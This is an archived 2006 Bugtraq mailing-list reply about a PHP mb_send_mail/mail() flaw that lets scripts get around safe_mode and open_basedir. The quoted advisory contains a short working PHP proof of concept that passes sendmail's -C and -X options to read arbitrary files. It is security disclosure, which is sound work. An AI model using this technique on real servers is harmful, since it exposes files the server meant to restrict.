lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <4405BA6C.2010302@ohgaki.net>
Date: Thu, 02 Mar 2006 00:14:52 +0900
From: Yasuo Ohgaki <yohgaki@...aki.net>
To: ced.clerget@...e.fr
Cc: bugtraq@...urityfocus.com
Subject: Re: (PHP) mb_send_mail security bypass


You should check mail() also...

mail() has exactly the same issue, since both mail() and mb_send_mail() applies
php_escape_shell_cmd() to 5th parameter.

Since the PoC is feeding usual options to sendmail command, php_escape_shell_cmd()
is useless for this kind of code.

Solution:
DO NOT TRUST safe_mode and open_basedir, since they are *FAIL* safe features for script bugs.
Safe_mode and open_basedir are not for the protection against PHP code writers.

By the way, php_escape_shell_cmd() is not applied to force_extra_parameter php.ini setting.
(force_extra_paremeter is INI_PERDIR|INI_SYSTEM setting)
Attackers can do much more with this feature if one would like to.

-- 
Yasuo Ohgaki


ced.clerget@...e.fr wrote:
> Vulnerable: PHP4, PHP5
> with use of sendmail 8.13.4 ><
> 
> When safemode disabled and open_basedir restriction in effect, we can pass extra parameters
> to sendmail command in mail function, especially the -C and -X arguments.
> -C for alternate configuration file
> -X to log all in a file
> Can be used to view files, pass the file to view to C argument and store content in file
> passed to X argument.
> 
> When safemode enabled and open_basedir restriction in effect, we can pass extra parameters
> to sendmail command in mb_send_mail function.
> 
> Solution:
> Use other sendmail command and don't allow extra parameters for mb_send_mail when safemode enabled
> 
> <?php
>         if (isset($_REQUEST['file'])) {
>                 $file = "sendlog";
>                 if (file_exists($file)) unlink($file);
>                 $extra = "-C ".$_REQUEST['file']." -X ".getcwd()."/".$file;
>                 mb_send_mail(NULL, NULL, NULL, NULL, $extra);
>                 echo "<pre>".file_get_contents($file)."</pre>";
>         }
> ?>
> 
> 
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ